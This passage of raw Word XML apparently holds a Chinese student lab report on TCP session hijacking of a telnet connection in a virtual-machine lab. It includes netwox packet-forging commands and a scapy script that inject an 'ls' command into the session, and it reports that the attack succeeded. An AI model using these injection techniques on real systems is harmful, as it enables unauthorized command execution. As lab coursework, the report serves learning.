        <w:t xml:space="preserve"> 23 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t xml:space="preserve"> 3897975576 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t xml:space="preserve"> 1464272433 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>-ack --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>-window 128 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>-data "6c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E417EED" w14:textId="77777777" w:rsidR="00771D4E" w:rsidRDefault="000D44FA" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01EB818C" wp14:editId="083DDEDB">
            <wp:extent cx="4483100" cy="128080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7126" cy="128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4FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBDECFE" w14:textId="77777777" w:rsidR="00771D4E" w:rsidRDefault="00771D4E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6405E242" w14:textId="52BE75E6" w:rsidR="00771D4E" w:rsidRDefault="00771D4E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>再发送7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>和0d：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431195A" w14:textId="01773012" w:rsidR="00771D4E" w:rsidRDefault="00771D4E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00771D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>sudo netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.19.138 --ip4-dst 192.168.19.145 --tcp-src 45588 --tcp-dst 23 --tcp-seqnum 3897975577 --tcp-acknum 1464272434 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "73"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547BDF28" w14:textId="07E678F1" w:rsidR="00771D4E" w:rsidRDefault="00771D4E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00771D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>sudo netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.19.138 --ip4-dst 192.168.19.145 --tcp-src 45588 --tcp-dst 23 --tcp-seqnum 3897975578 --tcp-acknum 1464272435 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "0d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA5D0A" w14:textId="5064C80A" w:rsidR="00771D4E" w:rsidRPr="00771D4E" w:rsidRDefault="00771D4E" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>上面两条指令执行完后即可看到服务器A执行M发送的ls命令返回的文件和目录，如Desktop，D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ownload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>s等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5867FAEF" w14:textId="1180EB3E" w:rsidR="00771D4E" w:rsidRDefault="000D44FA" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6847AC1B" wp14:editId="02D0D3E3">
            <wp:extent cx="4252066" cy="3460115"/>
            <wp:effectExtent l="0" t="0" r="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816" cy="34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6BEA" w14:textId="78B1A0EF" w:rsidR="00DA3591" w:rsidRDefault="00DA3591" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5177E21D" w14:textId="77777777" w:rsidR="00DA3591" w:rsidRPr="00DA3591" w:rsidRDefault="00DA3591" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCFE37A" w14:textId="455B007F" w:rsidR="000A6238" w:rsidRDefault="000A6238" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AC25201" w14:textId="26BFFF0F" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="000A6238">
      <w:r w:rsidRPr="00E32D07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先获取序列号和端口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA3CACA" w14:textId="679E9B8D" w:rsidR="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr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4F89844" wp14:editId="5EDB0049">
            <wp:extent cx="2557906" cy="1863725"/>
            <wp:effectExtent l="0" t="0" r="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7801" cy="18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495" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="000A6238"/>
    <w:p w14:paraId="25C784E9" w14:textId="086774FC" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="000A6238">
      <w:r w:rsidRPr="00E32D07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M中代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E7B50" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">#!/usr/bin/python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD9EC8" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB115BB" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">="192.168.19.138", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">="192.168.19.145") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B6DD1" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve"> = TCP(sport=45622, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">=23, flags="AP", seq=4064117330, ack=3238501506) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0BE52" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">data = "ls\n" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69222FFF" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t xml:space="preserve">/data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F982C2A" w14:textId="77777777" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:r w:rsidRPr="00E32D07">
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAE111" w14:textId="7EF3D1F8" w:rsidR="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:r w:rsidRPr="00E32D07">
        <w:t>send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>pkt,verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32D07">
        <w:t>=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB1FFC" w14:textId="0D97015C" w:rsidR="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07"/>
    <w:p w14:paraId="751BCECE" w14:textId="0465CF0B" w:rsidR="00E32D07" w:rsidRPr="00E32D07" w:rsidRDefault="00E32D07" w:rsidP="00E32D07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行程序，如图，服务器虚拟机A返回了执行ls指令的结果，实验成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2EF24F" w14:textId="283468C3" w:rsidR="00771D4E" w:rsidRPr="000A6238" w:rsidRDefault="00E32D07" w:rsidP="000A6238">
      <w:pPr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44A8E46" wp14:editId="1E4FE226">
            <wp:extent cx="4340804" cy="3602355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134" cy="36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1D4E" w:rsidRPr="000A62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08B86B" w14:textId="77777777" w:rsidR="006421A9" w:rsidRDefault="006421A9" w:rsidP="00C51908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7355A49D" w14:textId="77777777" w:rsidR="006421A9" w:rsidRDefault="006421A9" w:rsidP="00C51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B1DBF1" w14:textId="77777777" w:rsidR="006421A9" w:rsidRDefault="006421A9" w:rsidP="00C51908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DBF79C3" w14:textId="77777777" w:rsidR="006421A9" w:rsidRDefault="006421A9" w:rsidP="00C51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92562"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD282704"/>
    <w:lvl w:ilvl="0" w:tplc="C27C82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7A2739"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFF8EE64"/>
    <w:lvl w:ilvl="0" w:tplc="5EBA7E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42595"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7266CBA"/>
    <w:lvl w:ilvl="0" w:tplc="434415CE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E328E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="534AD5A2"/>
    <w:lvl w:ilvl="0" w:tplc="F6A492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0B269DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA26D7FC"/>
    <w:lvl w:ilvl="0" w:tplc="7F58C824">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1．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F007A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8B8ECEA"/>
    <w:lvl w:ilvl="0" w:tplc="DD4E9D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6A"/>
    <w:rsid w:val="00031460"/>
    <w:rsid w:val="00074D21"/>
    <w:rsid w:val="000A6238"/>
    <w:rsid w:val="000B534D"/>
    <w:rsid w:val="000D2A01"/>
    <w:rsid w:val="000D44FA"/>
    <w:rsid w:val="000D796A"/>
    <w:rsid w:val="00114295"/>
    <w:rsid w:val="001F4A28"/>
    <w:rsid w:val="00223F0F"/>
    <w:rsid w:val="00226B27"/>
    <w:rsid w:val="0023565F"/>
    <w:rsid w:val="00252F92"/>
    <w:rsid w:val="00261CC7"/>
    <w:rsid w:val="00266ED3"/>
    <w:rsid w:val="00271210"/>
    <w:rsid w:val="002D7D04"/>
    <w:rsid w:val="00306F2D"/>
    <w:rsid w:val="0032339C"/>
    <w:rsid w:val="0033484C"/>
    <w:rsid w:val="003370FB"/>
    <w:rsid w:val="00344969"/>
    <w:rsid w:val="00383334"/>
    <w:rsid w:val="00390B5D"/>
    <w:rsid w:val="003910C2"/>
    <w:rsid w:val="003E2B80"/>
    <w:rsid w:val="003F1888"/>
    <w:rsid w:val="0040123E"/>
    <w:rsid w:val="00411EAC"/>
    <w:rsid w:val="00413367"/>
    <w:rsid w:val="00474FF1"/>
    <w:rsid w:val="004A398F"/>
    <w:rsid w:val="004C6F9E"/>
    <w:rsid w:val="004D50FE"/>
    <w:rsid w:val="00527933"/>
    <w:rsid w:val="00566C3E"/>
    <w:rsid w:val="00586290"/>
    <w:rsid w:val="005B1B3F"/>
    <w:rsid w:val="006421A9"/>
    <w:rsid w:val="006540EA"/>
    <w:rsid w:val="0067699E"/>
    <w:rsid w:val="006F46B8"/>
    <w:rsid w:val="007007B4"/>
    <w:rsid w:val="007119B4"/>
    <w:rsid w:val="0072386A"/>
    <w:rsid w:val="00743B5D"/>
    <w:rsid w:val="0077087C"/>
    <w:rsid w:val="00771D4E"/>
    <w:rsid w:val="00794353"/>
    <w:rsid w:val="007A5DC7"/>
    <w:rsid w:val="007B5106"/>
    <w:rsid w:val="007E1B48"/>
    <w:rsid w:val="00816CBB"/>
    <w:rsid w:val="00827D9C"/>
    <w:rsid w:val="00846D29"/>
    <w:rsid w:val="008504E6"/>
    <w:rsid w:val="00897F52"/>
    <w:rsid w:val="009118DD"/>
    <w:rsid w:val="00926B71"/>
    <w:rsid w:val="009819B1"/>
    <w:rsid w:val="009B4AC6"/>
    <w:rsid w:val="009D1EA0"/>
    <w:rsid w:val="009D27BA"/>
    <w:rsid w:val="00AA69D5"/>
    <w:rsid w:val="00AC03AB"/>
    <w:rsid w:val="00AD6DE8"/>
    <w:rsid w:val="00B527E9"/>
    <w:rsid w:val="00B902DB"/>
    <w:rsid w:val="00BA5145"/>
    <w:rsid w:val="00C0589D"/>
    <w:rsid w:val="00C07DF8"/>
    <w:rsid w:val="00C331E8"/>
    <w:rsid w:val="00C37630"/>
    <w:rsid w:val="00C51908"/>
    <w:rsid w:val="00CA5B3E"/>
    <w:rsid w:val="00D85ACB"/>
    <w:rsid w:val="00D87386"/>
    <w:rsid w:val="00D945E2"/>
    <w:rsid w:val="00D95668"/>
    <w:rsid w:val="00DA3591"/>
    <w:rsid w:val="00DE2354"/>
    <w:rsid w:val="00E07408"/>
    <w:rsid w:val="00E32D07"/>
    <w:rsid w:val="00E532EE"/>
    <w:rsid w:val="00EA6FC4"/>
    <w:rsid w:val="00EC0CC8"/>
    <w:rsid w:val="00EE1E70"/>
    <w:rsid w:val="00EE7382"/>
    <w:rsid w:val="00F238E0"/>
    <w:rsid w:val="00F34B64"/>
    <w:rsid w:val="00F56CF0"/>
    <w:rsid w:val="00F96629"/>
    <w:rsid w:val="00F97799"/>
    <w:rsid w:val="00FA765F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BBE7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6FFEE3DE-B69C-4223-8A1A-E67D14C8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84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33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339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519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19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19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19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3828</TotalTime>
  <Pages>5</Pages>
  <Words>307</Words>
  <Characters>1752</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>14</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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XT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>R XT</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-02T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-12T10:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>